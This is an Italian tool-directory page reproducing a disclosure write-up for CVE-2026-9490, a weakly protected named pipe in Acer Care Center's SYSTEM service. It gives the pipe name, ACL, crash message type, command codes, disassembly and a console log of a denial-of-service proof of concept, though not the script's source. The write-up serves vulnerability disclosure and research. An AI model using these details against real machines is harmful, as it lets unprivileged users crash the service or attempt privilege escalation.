Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-9490 — Il servizio ACCSvc crea una Named Pipe con un descrittore di sicurezza (Security Descriptor) debole che consente a qualsiasi utente autenticato di connettersi e inviare messaggi. Quando un messaggio appositamente predisposto (tipo di messaggio 0x03) viene inviato alla pipe, il servizio va in crash con codice di uscita 1067 (ERROR_PROCESS_ABORTED). | Kitploit
Strumenti/GitHubGitHub/ugvxb/cve-2026-9490
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitReverse EngineeringPenetration TestingAnalisi di Binari
GitHubugvxb/cve-2026-9490

CVE-2026-9490

Vedi Repository
2 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Il servizio ACCSvc crea una Named Pipe con un descrittore di sicurezza (Security Descriptor) debole che consente a qualsiasi utente autenticato di connettersi e inviare messaggi. Quando un messaggio appositamente predisposto (tipo di messaggio 0x03) viene inviato alla pipe, il servizio va in crash con codice di uscita 1067 (ERROR_PROCESS_ABORTED).

Condividi

CVE ID: CVE-2026-9490
Ricercatore: Vo Duc Thang (ugvxb)
Riconoscimento: https://community.acer.com/en/kb/articles/19668

1. Sommario Esecutivo

È stata identificata una vulnerabilità di sicurezza critica nel servizio Acer Care Center (ACCSvc.exe). La vulnerabilità consente a qualsiasi utente locale autenticato di mandare in crash il servizio di sistema (Denial of Service) e potenzialmente di elevare i privilegi tramite un'interfaccia Named Pipe debolmente protetta.

Il servizio, che viene eseguito con privilegi SYSTEM (LocalSystem), espone una Named Pipe con controlli di accesso eccessivamente permissivi che concedono a tutti gli Utenti Autenticati i permessi di lettura, scrittura ed esecuzione.


2. Dettagli della Vulnerabilità

2.1 Componente Interessata

AttributoValore
ProdottoAcer Care Center
ComponenteACCSvc.exe (Servizio ACC)
Nome del servizioACCSvc
Percorso di installazioneC:\Program Files (x86)\Acer\Care Center\
Account del servizioLocalSystem (NT AUTHORITY\SYSTEM)
Tipo di avvioAUTO_START
Named Pipe\.\pipe\treadstone_service_LightMode

2.2 Vulnerabilità #1: Denial of Service

Descrizione

Il servizio ACCSvc crea una Named Pipe con un Security Descriptor debole che consente a qualsiasi utente autenticato di connettersi e inviare messaggi. Quando un messaggio appositamente modificato (tipo di messaggio 0x03) viene inviato alla pipe, il servizio va in crash con codice di uscita 1067 (ERROR_PROCESS_ABORTED).

Descrittore di Sicurezza (SDDL)

root@kitploit:~
D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GRGWGX;;;AU)(A;OICI;GA;;;BA)

Analisi SDDL

Impatto

Un utente standard senza privilegi speciali può terminare il servizio di sistema ACCSvc, rendendo non disponibile la funzionalità di Acer Care Center.

2.3 Vulnerabilità #2: Potenziale Escalation Locale dei Privilegi

Descrizione

La stessa ACL debole della Named Pipe consente agli utenti autenticati di inviare messaggi di comando che inducono il servizio a eseguire applicazioni launcher tramite CreateProcessAsUserW.

Codici di Comando

ComandoValore HexEseguibile di destinazione
0x19065102501ACCAPPLauncher.exe
0x19066102502ACCSWALauncher.exe
0x19067102503ACCFixpackFolderCleaner.exe

3. Analisi Tecnica

3.1 Analisi del Binario

AttributoValore
FileACCSvc.exe
TipoPE32+ executable (console) x86-64
Strumento di analisiRadare2

3.2 Funzioni Chiave Identificate

3.3 Parametri di Creazione della Named Pipe

root@kitploit:~
Pipe Name:        \\.\pipe\treadstone_service_LightMode
dwOpenMode:       0x03 (PIPE_ACCESS_DUPLEX)
dwPipeMode:       0x06 (PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE)
nMaxInstances:    255
nOutBufferSize:   512
nInBufferSize:    512
nDefaultTimeOut:  1000ms

3.4 Logica di Dispatch dei Comandi

root@kitploit:~
0x140008b1a      mov ebx, dword [rdx + rcx]     ; Read command
0x140008b1d      lea eax, [rbx - 0x19065]       ; Subtract base
0x140008b23      cmp eax, 2                      ; Check range
0x140008b26      ja  0x140008bde                 ; Jump if invalid

4. Risultati dello Sfruttamento

root@kitploit:~
accesschk.exe -v \pipe\treadstone_service_LightMode
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
\\.\Pipe\treadstone_service_LightMode
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\Authenticated Users
        FILE_ADD_FILE
        FILE_CREATE_PIPE_INSTANCE
        FILE_APPEND_DATA
        FILE_EXECUTE
        FILE_LIST_DIRECTORY
        FILE_READ_ATTRIBUTES
        FILE_READ_DATA
        FILE_READ_EA
        FILE_TRAVERSE
        FILE_WRITE_ATTRIBUTES
        FILE_WRITE_DATA
        FILE_WRITE_EA
        SYNCHRONIZE
        READ_CONTROL
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
        
C:\Users\thang\Downloads\Acer>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

C:\Users\thang\Downloads\Acer>sc qc ACCSvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Acer\Care Center\ACCSvc.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ACC Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\thang\Downloads\Acer>sc query ACCSvc

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:\Users\thang\Downloads\Acer>python exploit_dos.py
[*] ACCSvc DoS Attack
[*] Target: \\.\pipe\treadstone_service_LightMode
[+] DoS payload sent - service should crash

C:\Users\thang\Downloads\Acer>sc query ACCSvc

SERVICE_NAME: ACCSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 1067  (0x42b)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Risultato: Un utente standard è riuscito a mandare in crash il servizio SYSTEM!


5. Valutazione del Rischio

5.1 Punteggio CVSS v4.0

MetricaValore
Vettore CVSS 4.0AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/RE:M
Punteggio Base CVSS6.8 (Medio)

5.2 Classificazioni CWE

ID CWENome
CWE-269Gestione Impropria dei Privilegi

6. Disclaimer

Questa PoC è solo a scopo educativo e di ricerca sulla sicurezza autorizzata. L'autore non è responsabile per qualsiasi uso improprio. Lo sfruttamento senza autorizzazione è illegale.

Scarica lo strumento
ACEPrincipalePermessoValutazione
(D;OICI;GA;;;BG)Ospiti predefinitiNEGA TUTTOSicuro
(D;OICI;GA;;;AN)AnonimoNEGA TUTTOSicuro
(A;OICI;GRGWGX;;;AU)Utenti AutenticatiLettura/Scrittura/EsecuzioneVULNERABILE
(A;OICI;GA;;;BA)Amministratori predefinitiCONSENTI TUTTOPrevisto
Punto di ingresso0x14000fd4c
FunzioneIndirizzoScopo
fcn.140009a700x140009a70CreateNamedPipeW - Crea la pipe vulnerabile
fcn.1400075700x140007570CreateProcessAsUserW - Avvia processi
fcn.14000a8a00x14000a8a0Handler ReadFile
fcn.1400099500x140009950Handler WriteFile
fcn.1400080500x140008050Dispatcher dei messaggi